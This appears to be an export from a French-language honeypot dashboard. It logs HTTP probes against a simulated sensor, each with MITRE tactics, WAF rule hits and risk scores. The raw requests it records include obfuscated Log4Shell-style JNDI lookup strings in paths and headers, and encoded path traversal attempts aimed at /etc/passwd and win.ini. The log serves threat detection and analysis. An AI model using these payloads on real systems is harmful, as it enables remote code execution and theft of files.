| TCP | 8005 · HTTP | http | Sonde port 8005/TCP port 8005 tcp · via HTTP:8005 · (sonde / probe) · → /${${8vs:-j}${za:n:z7:-n}${3zg:gap6:y:-d}${26:1… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${8vs:-j}${za:n:z7:-n}${3zg:gap6:y:-d}${26:13a9:-i}${a:eo:-:}${l:3ms:-l}${034:i:p8f:-d}${i:4s:-a… UA ${${2lfj:-j}${uw2d:-n}${baf:vpzy:f0ph:-d}${m:yab:c:-i}${94u:-:}…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${8vs:-j}${za:n:z7:-n}${3zg:gap6:y:-d}${26:13a9:-i}${a:eo:-:}${l:3ms:-l}${034:i:p8f:-d}${i:4s:-a}${m:-p}${0ie:-:}${561a:-/}${hun:-/}${9tz8:b6:7zh:-P}${25u:v6t:y8wp:-A}${bdq:j0d:-l}${zp:8:c:-0}${nq:s5b:-c}${jc5:--}${${v:j:ab1:-s}${v3:-y}${43l:-s}${4v:-:}${4e3t:e:ns:-j}${nwc7:5g:6e:-a}${69:-v}${r:-a}${4x:x:s2n:-.}${8z:9tcr:-v}${x:hlv1:fjlg:-e}${134:qg0:m:-r}${u:ut6:gx:-s}${bv:k6:ws:-i}${al:8:-o}${o:6w:67g:-n}}${a:-.}${ma9r:-f}${8n:-0}${y:-5}${inf:0:6g:-c}${nq8:g1:n:-3}${s:1:-e}${xn:oi:-4}${v:x:co:-0}${rv:-
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8005
Chemin / cible
/${${8vs:-j}${za:n:z7:-n}${3zg:gap6:y:-d}${26:13a9:-i}${a:eo:-:}${l:3ms:-l}${034:i:p8f:-d}${i:4s:-a}${m:-p}${0ie:-:}${561a:-/}${hun:-/}${9tz8:b6:7zh:-P}${25u:v…
Preuve honeypot — Sonde port 8005/TCP
Connexion détectée sur le port 8005 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8005_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${2lfj:-j}${uw2d:-n}${baf:vpzy:f0ph:-d}${m:yab:c:-i}${94u:-:}${o2d3:xzf:-l}${w:d4k:7l1:-d}${74l:-a}${tw:-p}${8qlp:0s3q:ia:-:}${ec:-/}${l:xat0:hj:-/}${fa:q573:wi23:-U}${d2s:ad:yoc:-A}${7:rn:-l}${ip9…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${8vs:-j}${za:n:z7:-n}${3zg:gap6:y:-d}${26:13a9:-i}${a:eo:-:}${l:3ms:-l}${034:i:p8f:-d}${i:4s:-a}${m:-p}${0ie:-:}${561a:-
Requête brute (extrait)
GET /${${8vs:-j}${za:n:z7:-n}${3zg:gap6:y:-d}${26:13a9:-i}${a:eo:-:}${l:3ms:-l}${034:i:p8f:-d}${i:4s:-a}${m:-p}${0ie:-:}${561a:-/}${hun:-/}${9tz8:b6:7zh:-P}${25u:v6t:y8wp:-A}${bdq:j0d:-l}${zp:8:c:-0}${nq:s5b:-c}${jc5:--}${${v:j:ab1:-s}${v3:-y}${43l:-s}${4v
|
|||||||
| TCP | 8005 · HTTP | http | Sonde port 8005/TCP port 8005 tcp · via HTTP:8005 · (sonde / probe) | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${uw30:2:c:-j}${wzq:-n}${r:-d}${b56:-i}${w7:-:}${kr:-l}${1vf7…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8005
Chemin / cible
/
Preuve honeypot — Sonde port 8005/TCP
Connexion détectée sur le port 8005 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8005_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${uw30:2:c:-j}${wzq:-n}${r:-d}${b56:-i}${w7:-:}${kr:-l}${1vf7:bo:-d}${vxpn:-a}${lw8:-p}${j50n:g:-:}${6:9czs:2t:-/}${d28:owa:-/}${l:875b:-U}${v4fg:-A}${7i:-l}${8n:q6t:-0}${h0:2tzf:-c}${sy:--}${${pd:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005
Accept: */*
User-Agent: ${${uw30:2:c:-j}${wzq:-n}${r:-d}
Requête brute (extrait)
POST / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: ${${uw30:2:c:-j}${wzq:-n}${r:-d}${b56:-i}${w7:-:}${kr:-l}${1vf7:bo:-d}${vxpn:-a}${lw8:-p}${j50n:g:-:}${6:9czs:2t:-/}${d28:owa:-/}${l:875b:-U}${v4fg:-A}${7i:-l}$
|
|||||||
| TCP | 8005 · HTTP | http | Sonde port 8005/TCP port 8005 tcp · via HTTP:8005 · (sonde / probe) | Élevée | Moyen · 46 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8005
Chemin / cible
/
Preuve honeypot — Sonde port 8005/TCP
Connexion détectée sur le port 8005 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8005_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 46
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${lp:3xz:-j}${cv:m:41l:
|
|||||||
| TCP | 8005 · HTTP | http | Sonde port 8005/TCP port 8005 tcp · via HTTP:8005 · (sonde / probe) | Élevée | Moyen · 57 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${3qwy:-j}${t0ng:b4:-n}${rtij:9gn:-d}${h:-i}${s0:os:-:}${gl:u…
Émulateur
HTTP
WAF
23
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8005
Chemin / cible
/
Preuve honeypot — Sonde port 8005/TCP
Connexion détectée sur le port 8005 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8005_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 57
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${3qwy:-j}${t0ng:b4:-n}${rtij:9gn:-d}${h:-i}${s0:os:-:}${gl:ud:4l0t:-l}${ylrb:8gn:-d}${ky:-a}${h:id:y4jk:-p}${kmx:-:}${9j:7xr:hz3f:-/}${s:-/}${t5e:n027:-U}${h:-A}${4a1:-l}${moj:yg:-0}${zab:-c}${k:9…
Règles WAF
rce-0
rce-14
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005
Accept: */*
User-Agent: ${${3qwy:-j}${t0ng:b4:-n}${rtij:9
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8005 Accept: */* User-Agent: ${${3qwy:-j}${t0ng:b4:-n}${rtij:9gn:-d}${h:-i}${s0:os:-:}${gl:ud:4l0t:-l}${ylrb:8gn:-d}${ky:-a}${h:id:y4jk:-p}${kmx:-:}${9j:7xr:hz3f:-/}${s:-/}${t5e:n027:-U}${h:
|
|||||||
| TCP | 8111 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8111 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8111
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8111 Accept: */* User-Agent: Mozilla/5.0 (Macintosh;
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8111 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8111 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8111 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8111
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8111 Accept: */* User-Agent: Mozilla/5.0 (Macin
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8111 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8009 · HTTP | http | Scan de ports port scan syn · via HTTP:8009 · (reconnaissance) | Élevée | Moyen · 54 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8009
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8040 · HTTP | http | SSRF interne ssrf internal · via HTTP:8040 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8040
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8040 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8040 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 9000 · HTTP | http | SSRF interne ssrf internal · via HTTP:9000 · (tentative d'exploit) · → /%5cgoogle.com/4af206ebd4.html | Élevée | Moyen · 57 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /%5cgoogle.com/4af206ebd4.html UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/%5cgoogle.com/4af206ebd4.html
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9000
Chemin / cible
/%5cgoogle.com/4af206ebd4.html
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 57
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: Mozi
Requête brute (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 84 · HTTP | http | SSRF interne ssrf internal · via HTTP:84 · (tentative d'exploit) | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
84
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 54
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:84 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac O
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:84 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 9207 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:9207 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 67 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9207
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0715
CRS-930100-sub
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/wi
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9207 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac |
|||||||
| TCP | 9207 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:9207 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 67 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9207
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
Http Lfi
pat-0716
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9207 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X |
|||||||
| TCP | 8888 · HTTP | http | SSRF interne ssrf internal · via HTTP:8888 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
HTTP alt 8888 probe
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8501 · HTTP | http | SSRF interne ssrf internal · via HTTP:8501 · (tentative d'exploit) | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8501
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8501 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8501 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8098 · HTTP | http | Scan de ports port scan syn · via HTTP:8098 · (reconnaissance) | Élevée | Moyen · 53 |
